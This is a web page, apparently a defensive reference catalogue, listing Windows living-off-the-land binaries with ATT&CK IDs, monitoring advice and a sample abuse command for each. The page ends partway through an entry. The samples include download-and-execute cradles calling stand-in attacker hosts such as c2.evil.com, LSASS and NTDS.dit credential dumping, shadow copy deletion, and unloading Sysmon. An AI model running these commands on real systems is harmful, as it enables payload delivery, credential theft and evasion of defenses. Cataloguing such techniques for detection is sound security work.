WindowsPlatform Command Center248 Verified Binaries Documented

Windows Living-off-the-Land Binaries (LOLBAS)

Native Windows utilities abused for file transfer, UAC bypass, credential dumping, and defense evasion.

Windows Telemetry Architecture

Monitor Windows Security Event 4688 (Process Creation with Command Line Auditing enabled) and Sysmon Event ID 1 (Process Create), Event ID 3 (Network Connect), Event ID 7 (Image Loaded), and Event ID 10 (ProcessAccess to lsass.exe). Enforce WDAC and AppLocker publisher rules to restrict untrusted script engines.

Standard Binary Locations:C:\Windows\System32C:\Windows\SysWOW64C:\Windows\Microsoft.NET\Framework64\*

windows Living-off-the-Land Catalog

248 verified utilities
2 documented tactics
T1105T1140

certutil.exe

Certutil.exe is a command-line program installed as part of Certificate Services. Attackers frequently abuse it to download arbitrary files from remote URLs, encode/decode Base64 payloads to evade detection, and hash files.

Sample Vector:
certutil.exe -urlcache -split -f http://example.com/payload.exe %TEMP%\update.exe
2 documented tactics
T1218.005

mshta.exe

Microsoft HTML Application (MSHTA) host executes .hta files and scripts embedded inside web pages. Attackers abuse mshta to execute malicious inline VBScript or JScript directly from the command line or remote HTTP servers.

Sample Vector:
mshta.exe vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run ""powershell.exe -nop -w hidden -enc JAB...="",0"))
2 documented tactics
T1218.011

rundll32.exe

The Rundll32 program loads and runs 32-bit and 64-bit Dynamic Link Libraries (DLLs). Threat actors use it to execute exported functions from arbitrary DLLs, run scriptlets, or execute code via MSHTML protocol handlers.

Sample Vector:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/payload.sct")
1 documented tactics
T1197T1105

bitsadmin.exe

Background Intelligent Transfer Service (BITS) administrator tool manages asynchronous, throttled background transfers. Attackers use BITS to stage remote downloads that survive reboots and evade conventional network monitoring.

Sample Vector:
bitsadmin.exe /transfer myJob /download /priority foreground http://c2.evil.com/implant.exe C:\Windows\Temp\implant.exe
1 documented tactics
T1218.010

regsvr32.exe

Regsvr32 registers and unregisters OLE controls, such as DLLs and ActiveX controls in the Windows Registry. When passed the /i switch pointing to an HTTP/HTTPS URL and scrobj.dll, regsvr32 downloads and executes remote COM scriptlets in memory (the classic Squiblydoo technique).

Sample Vector:
regsvr32.exe /s /n /u /i:http://attack.server/payload.sct scrobj.dll
2 documented tactics
T1059.001T1105

powershell.exe

PowerShell is a powerful task automation framework and scripting engine. Widely abused by threat actors for in-memory execution (fileless malware), credential dumping, remote command execution, and AMSI bypasses.

Sample Vector:
powershell.exe -nop -w hidden -ep bypass -c "IEX ((New-Object Net.WebClient).DownloadString('http://c2.server/stage2.ps1'))"
1 documented tactics
T1047

wmic.exe

Windows Management Instrumentation Command-line (WMIC) provides a command-line interface for WMI. Abused for process execution, remote lateral movement, process creation, and running XSL stylesheets.

Sample Vector:
wmic.exe process call create "powershell.exe -w hidden -enc ..."
1 documented tactics
T1059.005

cscript.exe

CScript.exe is a command-line version of the Windows Script Host that facilitates running VBScript and JScript scripts. Frequently abused to run dropped scripts, execute obfuscated VBScript files, and perform defense evasion.

Sample Vector:
cscript.exe //B //Nologo %TEMP%\recon.vbs
1 documented tactics
T1218

AddinUtil.exe

.NET Tool used for updating cache files for Microsoft Office Add-Ins.

Sample Vector:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:.
1 documented tactics
T1105

AppInstaller.exe

Tool used for installation of AppX/MSIX applications on Windows 10

Sample Vector:
start ms-appinstaller://?source={REMOTEURL:.exe}
1 documented tactics
T1127.002

Applaunch.exe

Microsoft .NET ClickOnce Launch Utility.

Sample Vector:
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Applaunch.exe" /activate "{REMOTEURL}#APPLICATION_METADATA_HERE"
1 documented tactics
T1127

Aspnet_Compiler.exe

ASP.NET Compilation Tool

Sample Vector:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
1 documented tactics
T1053.002

At.exe

Schedule periodic tasks

Sample Vector:
C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}
1 documented tactics
T1218

Atbroker.exe

Helper binary for Assistive Technology (AT)

Sample Vector:
ATBroker.exe /start malware
5 documented tactics
T1202T1218

Bash.exe

File used by Windows subsystem for Linux

Sample Vector:
bash.exe -c "{CMD}"
2 documented tactics
T1218T1105

CertOC.exe

Used for installing certificates

Sample Vector:
certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}
2 documented tactics
T1105

CertReq.exe

Used for requesting and managing certificates

Sample Vector:
CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}
1 documented tactics
T1218

Change.exe

Remote Desktop Services MultiUser Change Utility

Sample Vector:
change.exe user
2 documented tactics
T1485T1562

Cipher.exe

File Encryption Utility

Sample Vector:
cipher /w:{PATH_ABSOLUTE:folder}
4 documented tactics
T1564.004T1059.003

Cmd.exe

The command-line interpreter in Windows

Sample Vector:
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat
1 documented tactics
T1078

Cmdkey.exe

creates, lists, and deletes stored user names and passwords or credentials.

Sample Vector:
cmdkey /list
1 documented tactics
T1105

cmdl32.exe

Microsoft Connection Manager Auto-Download

Sample Vector:
cmdl32 /vpn /lan %cd%\config
3 documented tactics
T1218.003

Cmstp.exe

Installs or removes a Connection Manager service profile.

Sample Vector:
cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}
1 documented tactics
T1036.005

Colorcpl.exe

Binary that handles color management

Sample Vector:
colorcpl {PATH}
1 documented tactics
T1548.002

ComputerDefaults.exe

ComputerDefaults.exe is a Windows system utility for managing default applications for tasks like web browsing, emailing, and media playback.

Sample Vector:
ComputerDefaults.exe
2 documented tactics
T1567T1105

ConfigSecurityPolicy.exe

Binary part of Windows Defender. Used to manage settings in Windows Defender. You can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.

Sample Vector:
ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}
2 documented tactics
T1202

Conhost.exe

Console Window host

Sample Vector:
conhost.exe {CMD}
2 documented tactics
T1218.002

Control.exe

Binary used to launch controlpanel items in Windows

Sample Vector:
control.exe {PATH_ABSOLUTE}:evil.dll
2 documented tactics
T1127

Csc.exe

Binary file used by .NET Framework to compile C# code

Sample Vector:
csc.exe -out:{PATH:.exe} {PATH:.cs}
1 documented tactics
T1218

CustomShellHost.exe

A host process that is used by custom shells when using Windows in Kiosk mode.

Sample Vector:
CustomShellHost.exe
1 documented tactics
T1567

DataSvcUtil.exe

DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.

Sample Vector:
DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}
1 documented tactics
T1105

Desktopimgdownldr.exe

Windows binary used to configure lockscreen/desktop image

Sample Vector:
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr
1 documented tactics
T1564

DeviceCredentialDeployment.exe

Device Credential Deployment

Sample Vector:
DeviceCredentialDeployment
1 documented tactics
T1127.002

Dfsvc.exe

ClickOnce engine in Windows used by .NET

Sample Vector:
rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
3 documented tactics
T1564.004T1105

Diantz.exe

Binary that package existing files into a cabinet (.cab) file

Sample Vector:
diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab
2 documented tactics
T1003.003T1202

Diskshadow.exe

Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).

Sample Vector:
diskshadow.exe /s {PATH:.txt}
1 documented tactics
T1543.003

Dnscmd.exe

A command-line interface for managing DNS servers

Sample Vector:
dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}
6 documented tactics
T1105T1564.004

Esentutl.exe

Binary for working with Microsoft Joint Engine Technology (JET) database

Sample Vector:
esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o
1 documented tactics
T1548.002

Eudcedit.exe

Private Character Editor Windows Utility

Sample Vector:
eudcedit
2 documented tactics
T1548.002

Eventvwr.exe

Displays Windows Event Logs in a GUI window.

Sample Vector:
eventvwr.exe
3 documented tactics
T1105T1564.004

Expand.exe

Binary that expands one or more compressed files

Sample Vector:
expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat}
2 documented tactics
T1202

Explorer.exe

Binary used for managing files and system components within Windows

Sample Vector:
explorer.exe /root,"{PATH_ABSOLUTE:.exe}"
1 documented tactics
T1218

Extexport.exe

Load a DLL located in the c:\test folder with a specific name.

Sample Vector:
Extexport.exe {PATH_ABSOLUTE:folder} foo bar
4 documented tactics
T1564.004T1105

Extrac32.exe

Extract to ADS, copy or overwrite a file with Extrac32.exe

Sample Vector:
extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe
4 documented tactics
T1564.004T1552.001

Findstr.exe

Write to ADS, discover, or download files with Findstr.exe

Sample Vector:
findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe
1 documented tactics
T1105

Finger.exe

Displays information about a user or users on a specified remote computer that is running the Finger service or daemon

Sample Vector:
finger user@example.host.com | more +2 | cmd
1 documented tactics
T1562.001

fltMC.exe

Filter Manager Control Program used by Windows

Sample Vector:
fltMC.exe unload SysmonDrv
2 documented tactics
T1202T1564.004

Forfiles.exe

Selects and executes a command on a file or set of files. This command is useful for batch processing.

Sample Vector:
forfiles /p c:\windows\system32 /m notepad.exe /c "{CMD}"
3 documented tactics
T1485T1218

Fsutil.exe

File System Utility

Sample Vector:
fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE}
2 documented tactics
T1202T1105

Ftp.exe

A binary designed for connecting to FTP servers

Sample Vector:
echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt
2 documented tactics
T1218

Gpscript.exe

Used by group policy to process scripts

Sample Vector:
Gpscript /logon
3 documented tactics
T1105T1218.001

Hh.exe

Binary used for processing chm files in Windows

Sample Vector:
HH.exe {REMOTEURL:.bat}
1 documented tactics
T1218

Ie4uinit.exe

Executes commands from a specially prepared ie4uinit.inf file.

Sample Vector:
ie4uinit.exe -BaseSettings
1 documented tactics
T1218

iediagcmd.exe

Diagnostics Utility for Internet Explorer

Sample Vector:
set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}
2 documented tactics
T1105T1218

Ieexec.exe

The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.

Sample Vector:
ieexec.exe {REMOTEURL:.exe}
2 documented tactics
T1127

Ilasm.exe

used for compile c# code into dll or exe.

Sample Vector:
ilasm.exe {PATH_ABSOLUTE:.txt} /exe
1 documented tactics
T1105

IMEWDBLD.exe

Microsoft IME Open Extended Dictionary Module

Sample Vector:
C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL}
1 documented tactics
T1218

Infdefaultinstall.exe

Binary used to perform installation based on content inside inf files

Sample Vector:
InfDefaultInstall.exe {PATH:.inf}
3 documented tactics
T1218.004T1105

Installutil.exe

The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies

Sample Vector:
InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}
2 documented tactics
T1548.002

iscsicpl.exe

Microsoft iSCSI Initiator Control Panel tool

Sample Vector:
c:\windows\syswow64\iscsicpl.exe
2 documented tactics
T1127

Jsc.exe

Binary file used by .NET to compile JavaScript code to .exe or .dll format

Sample Vector:
jsc.exe {PATH:.js}
1 documented tactics
T1105

Ldifde.exe

Creates, modifies, and deletes LDAP directory objects.

Sample Vector:
Ldifde -i -f {PATH:.ldf}
4 documented tactics
T1564.004T1105

Makecab.exe

Binary to package existing files into a cabinet (.cab) file

Sample Vector:
makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab
2 documented tactics
T1218.013T1564.004

Mavinject.exe

Used by App-v in Windows

Sample Vector:
MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll}
3 documented tactics
T1127

Microsoft.Workflow.Compiler.exe

A utility included with .NET that is capable of compiling and executing C# or VB.net code.

Sample Vector:
Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
3 documented tactics
T1218.014

Mmc.exe

Load snap-ins to locally and remotely manage Windows systems

Sample Vector:
mmc.exe -Embedding {PATH_ABSOLUTE:.msc}
1 documented tactics
T1047

Mofcomp.exe

Compiler that parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Threat actors can leverage this binary to install malicious MOF scripts

Sample Vector:
mofcomp.exe {PATH_ABSOLUTE:.mof}
3 documented tactics
T1105T1564.004

MpCmdRun.exe

Binary part of Windows Defender. Used to manage settings in Windows Defender

Sample Vector:
MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}
5 documented tactics
T1127.001T1036

Msbuild.exe

Used to compile and execute code

Sample Vector:
msbuild.exe {PATH:.xml}
1 documented tactics
T1218

Msconfig.exe

MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows

Sample Vector:
Msconfig.exe -5
3 documented tactics
T1218T1202

Msdt.exe

Microsoft diagnostics tool

Sample Vector:
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE
3 documented tactics
T1105T1218.015

Msedge.exe

Microsoft Edge browser

Sample Vector:
msedge.exe {REMOTEURL:.exe.txt}
4 documented tactics
T1218.015

msedgewebview2.exe

msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.

Sample Vector:
msedgewebview2.exe --no-sandbox --browser-subprocess-path="{PATH_ABSOLUTE:.exe}"
2 documented tactics
T1105T1218.015

msedge_proxy.exe

Microsoft Edge Browser

Sample Vector:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe {REMOTEURL:.zip}
5 documented tactics
T1218.007

Msiexec.exe

Used by Windows to execute msi files

Sample Vector:
msiexec /quiet /i {PATH:.msi}
1 documented tactics
T1105

msoxmled.exe

Microsoft Office XML Editor, used to handle XML documents in Microsoft Office.

Sample Vector:
msoxmled.exe /verb open {REMOTEURL}
1 documented tactics
T1546.007

Netsh.exe

Netsh is a Windows tool used to manipulate network interface settings.

Sample Vector:
netsh.exe add helper {PATH_ABSOLUTE:.dll}
1 documented tactics
T1105

Ngen.exe

Microsoft Native Image Generator.

Sample Vector:
ngen.exe {REMOTEURL}
1 documented tactics
T1548.002

odbcad32.exe

ODBC Data Source Administrator to manage User/System DSNs and ODBC drivers.

Sample Vector:
odbcad32.exe
3 documented tactics
T1218.008

Odbcconf.exe

Used in Windows for managing ODBC connections

Sample Vector:
odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}}
1 documented tactics
T1218

OfflineScannerShell.exe

Windows Defender Offline Shell

Sample Vector:
OfflineScannerShell
1 documented tactics
T1105

OneDriveStandaloneUpdater.exe

OneDrive Standalone Updater

Sample Vector:
OneDriveStandaloneUpdater
3 documented tactics
T1202

Pcalua.exe

Program Compatibility Assistant

Sample Vector:
pcalua.exe -a {PATH:.exe}
2 documented tactics
T1218T1202

Pcwrun.exe

Program Compatibility Wizard

Sample Vector:
Pcwrun.exe {PATH_ABSOLUTE:.exe}
2 documented tactics
T1040

Pktmon.exe

Capture Network Packets on the windows 10 with October 2018 Update or later.

Sample Vector:
pktmon.exe start --etw
1 documented tactics
T1547

Pnputil.exe

Used for installing drivers

Sample Vector:
pnputil.exe -i -a {PATH_ABSOLUTE:.inf}
2 documented tactics
T1218T1105

Presentationhost.exe

File is used for executing Browser applications

Sample Vector:
Presentationhost.exe {PATH_ABSOLUTE:.xbap}
3 documented tactics
T1564.004T1105

Print.exe

Used by Windows to send files to the printer

Sample Vector:
print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}
2 documented tactics
T1105T1564.004

PrintBrm.exe

Printer Migration Command-Line Tool

Sample Vector:
PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip}
1 documented tactics
T1218

Provlaunch.exe

Launcher process

Sample Vector:
provlaunch.exe LOLBin
1 documented tactics
T1113

Psr.exe

Windows Problem Steps Recorder, used to record screen and clicks.

Sample Vector:
psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0
1 documented tactics
T1218

Query.exe

Remote Desktop Services MultiUser Query Utility

Sample Vector:
query.exe user
1 documented tactics
T1218

Rasautou.exe

Windows Remote Access Dialer

Sample Vector:
rasautou -d {PATH:.dll} -p export_name -a a -e e
3 documented tactics
T1003T1003.001

rdrleakdiag.exe

Microsoft Windows resource leak diagnostic tool

Sample Vector:
rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
2 documented tactics
T1564.004T1003.002

Reg.exe

Used to manipulate the registry

Sample Vector:
reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg
2 documented tactics
T1218.009

Regasm.exe

Part of .NET

Sample Vector:
regasm.exe {PATH:.dll}
2 documented tactics
T1564.004

Regedit.exe

Used by Windows to manipulate registry

Sample Vector:
regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
1 documented tactics
T1564.004

Regini.exe

Used to manipulate the registry

Sample Vector:
regini.exe {PATH}:hidden.ini
1 documented tactics
T1218

Register-cimprovider.exe

Used to register new wmi providers

Sample Vector:
Register-cimprovider -path {PATH_ABSOLUTE:.dll}
2 documented tactics
T1218.009

Regsvcs.exe

Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies

Sample Vector:
regsvcs.exe {PATH:.dll}
2 documented tactics
T1105

Replace.exe

Used to replace file with another file

Sample Vector:
replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A
1 documented tactics
T1218

Reset.exe

Remote Desktop Services Reset Utility

Sample Vector:
reset.exe session
2 documented tactics
T1003T1187

Rpcping.exe

Used to verify rpc connection

Sample Vector:
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
1 documented tactics
T1218

Runexehelper.exe

Launcher process

Sample Vector:
runexehelper.exe {PATH_ABSOLUTE:.exe}
1 documented tactics
T1218

Runonce.exe

Executes a Run Once Task that has been configured in the registry

Sample Vector:
Runonce.exe /AlternateShellStartup
1 documented tactics
T1218

Runscripthelper.exe

Execute target PowerShell script

Sample Vector:
runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder}
2 documented tactics
T1564.004

Sc.exe

Used by Windows to manage services

Sample Vector:
sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
2 documented tactics
T1053.005

Schtasks.exe

Schedule periodic tasks

Sample Vector:
schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr "{CMD}"
3 documented tactics
T1202T1218

scp.exe

Used for uploading or downloading files over SSH.

Sample Vector:
scp.exe -o ProxyCommand="{CMD}" . localhost:.
2 documented tactics
T1202T1218

Scriptrunner.exe

Execute binary through proxy binary to evade defensive counter measures

Sample Vector:
Scriptrunner.exe -appvscript {PATH:.exe}
1 documented tactics
T1218

Setres.exe

Configures display settings

Sample Vector:
setres.exe -w 800 -h 600
2 documented tactics
T1218

SettingSyncHost.exe

Host Process for Setting Synchronization

Sample Vector:
SettingSyncHost -LoadAndRunDiagScript {PATH:.exe}
2 documented tactics
T1218

setupugc.exe

Setup Unattend Generic Command Processor used during Windows deployment.

Sample Vector:
setupugc.exe specialize
2 documented tactics
T1202

Sftp.exe

sftp.exe is a Windows command-line utility that uses the Secure File Transfer Protocol (SFTP) to securely transfer files between a local machine and a remote server.

Sample Vector:
sftp -o ProxyCommand="{CMD}" .
1 documented tactics
T1218

Sigverif.exe

File Signature Verification utility to verify digital signatures of files

Sample Vector:
sigverif.exe
3 documented tactics
T1202

ssh.exe

Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.

Sample Vector:
ssh localhost "{CMD}"
2 documented tactics
T1218

Stordiag.exe

Storage diagnostic tool

Sample Vector:
stordiag.exe
1 documented tactics
T1218

SyncAppvPublishingServer.exe

Used by App-v to get App-v server lists

Sample Vector:
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"
3 documented tactics
T1564.004T1105

Tar.exe

Used by Windows to extract and create archives.

Sample Vector:
tar -cf {PATH}:ads {PATH_ABSOLUTE:folder}
2 documented tactics
T1127

Ttdinject.exe

Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)

Sample Vector:
TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "{PATH:.exe}"
2 documented tactics
T1127T1003

Tttracer.exe

Used by Windows 1809 and newer to Debug Time Travel

Sample Vector:
tttracer.exe {PATH_ABSOLUTE:.exe}
1 documented tactics
T1202

Unregmp2.exe

Microsoft Windows Media Player Setup Utility

Sample Vector:
rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"
2 documented tactics
T1127

vbc.exe

Binary file used for compile vbs code

Sample Vector:
vbc.exe /target:exe {PATH_ABSOLUTE:.vb}
1 documented tactics
T1218.012

Verclsid.exe

Used to verify a COM object before it is instantiated by Windows Explorer

Sample Vector:
verclsid.exe /S /C {CLSID}
1 documented tactics
T1490

Vssadmin.exe

Volume Shadow Copy Service administrative command-line tool

Sample Vector:
vssadmin delete shadows /all /quiet
1 documented tactics
T1218

Wab.exe

Windows address book manager

Sample Vector:
wab.exe
2 documented tactics
T1003.003

wbadmin.exe

Windows Backup Administration utility

Sample Vector:
wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
1 documented tactics
T1047

wbemtest.exe

WMI/WBEM Test Binary

Sample Vector:
wbemtest.exe
3 documented tactics
T1105

winget.exe

Windows Package Manager tool

Sample Vector:
winget.exe install --manifest {PATH:.yml}
1 documented tactics
T1202

Wlrmdr.exe

Windows Logon Reminder executable

Sample Vector:
wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe}
2 documented tactics
T1218

WorkFolders.exe

Work Folders

Sample Vector:
WorkFolders
1 documented tactics
T1218

write.exe

Windows Write

Sample Vector:
write.exe
2 documented tactics
T1564.004

Wscript.exe

Used by Windows to execute scripts

Sample Vector:
wscript //e:vbscript {PATH}:script.vbs
1 documented tactics
T1548.002

Wsreset.exe

Used to reset Windows Store settings according to its manifest file

Sample Vector:
wsreset.exe
1 documented tactics
T1202

wt.exe

Windows Terminal

Sample Vector:
wt.exe {CMD}
1 documented tactics
T1218

wuauclt.exe

Windows Update Client

Sample Vector:
wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServer
3 documented tactics
T1218T1105

Xwizard.exe

Execute custom class that has been added to the registry or download a file with Xwizard.exe

Sample Vector:
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
5 documented tactics
T1218.011

Advpack.dll

Utility for installing software and drivers with rundll32.exe

Sample Vector:
rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1,
1 documented tactics
T1003.001

Comsvcs.dll

COM+ Services

Sample Vector:
rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full
2 documented tactics
T1218.011

Desk.cpl

Desktop Settings Control Panel

Sample Vector:
rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}
1 documented tactics
T1127.002

Dfshim.dll

ClickOnce engine in Windows used by .NET

Sample Vector:
rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}
5 documented tactics
T1218.011

Ieadvpack.dll

INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.

Sample Vector:
rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1,
1 documented tactics
T1218.011

Ieframe.dll

Internet Browser DLL for translating HTML code.

Sample Vector:
rundll32.exe ieframe.dll,OpenURL {PATH_ABSOLUTE:.url}
1 documented tactics
T1218.011

Mshtml.dll

Microsoft HTML Viewer

Sample Vector:
rundll32.exe Mshtml.dll,PrintHTML {PATH_ABSOLUTE:.hta}
1 documented tactics
T1218.011

Pcwutl.dll

Microsoft HTML Viewer

Sample Vector:
rundll32.exe pcwutl.dll,LaunchApplication {PATH:.exe}
1 documented tactics
T1105

PhotoViewer.dll

Windows Photo Viewer

Sample Vector:
rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll",ImageView_Fullscreen {REMOTEURL}
1 documented tactics
T1105

Scrobj.dll

Windows Script Component Runtime

Sample Vector:
rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}
2 documented tactics
T1218.011

Setupapi.dll

Windows Setup Application Programming Interface

Sample Vector:
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}
1 documented tactics
T1218.011

Shdocvw.dll

Shell Doc Object and Control Library.

Sample Vector:
rundll32.exe shdocvw.dll,OpenURL {PATH_ABSOLUTE:.url}
4 documented tactics
T1218.011

Shell32.dll

Windows Shell Common Dll

Sample Vector:
rundll32.exe shell32.dll,Control_RunDLL {PATH_ABSOLUTE:.dll}
1 documented tactics
T1105

Shimgvw.dll

Photo Gallery Viewer

Sample Vector:
rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen {REMOTEURL:.exe}
2 documented tactics
T1218.011

Syssetup.dll

Windows NT System Setup

Sample Vector:
rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}
6 documented tactics
T1218.011

Url.dll

Internet Shortcut Shell Extension DLL.

Sample Vector:
rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta}
2 documented tactics
T1218.011

Zipfldr.dll

Compressed Folder library

Sample Vector:
rundll32.exe zipfldr.dll,RouteTheCall {PATH:.exe}
1 documented tactics
T1216

CL_Invocation.ps1

Aero diagnostics script

Sample Vector:
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 \nSyncInvoke {CMD}
1 documented tactics
T1216

CL_LoadAssembly.ps1

PowerShell Diagnostic Script

Sample Vector:
powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"
1 documented tactics
T1216

CL_Mutexverifiers.ps1

Proxy execution with CL_Mutexverifiers.ps1

Sample Vector:
. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess {PATH:.ps1}
2 documented tactics
T1216

Launch-VsDevShell.ps1

Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet

Sample Vector:
powershell -ep RemoteSigned -f .\Launch-VsDevShell.ps1 -VsWherePath {PATH_ABSOLUTE:.exe}
2 documented tactics
T1216

Manage-bde.wsf

Script for managing BitLocker

Sample Vector:
set comspec={PATH_ABSOLUTE:.exe} & cscript c:\windows\system32\manage-bde.wsf
2 documented tactics
T1216

Pester.bat

Used as part of the Powershell pester

Sample Vector:
Pester.bat [/help|?|-?|/?] "$null; {CMD}"
1 documented tactics
T1216.001

Pubprn.vbs

Proxy execution with Pubprn.vbs

Sample Vector:
pubprn.vbs 127.0.0.1 script:{REMOTEURL:.sct}
1 documented tactics
T1216.002

Syncappvpublishingserver.vbs

Script used related to app-v and publishing server

Sample Vector:
SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"
1 documented tactics
T1216

UtilityFunctions.ps1

PowerShell Diagnostic Script

Sample Vector:
powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"
3 documented tactics
T1216T1220

winrm.vbs

Script used for manage Windows RM settings

Sample Vector:
winrm invoke Create wmicimv2/Win32_Process @{CommandLine="{CMD}"} -r:http://target:5985
2 documented tactics
T1218

AccCheckConsole.exe

Verifies UI accessibility requirements

Sample Vector:
AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll}
4 documented tactics
T1003.001T1127

adplus.exe

Debugging tool included with Windows Debugging Tools

Sample Vector:
adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet
2 documented tactics
T1218

AgentExecutor.exe

Intune Management Extension included on Intune Managed Devices

Sample Vector:
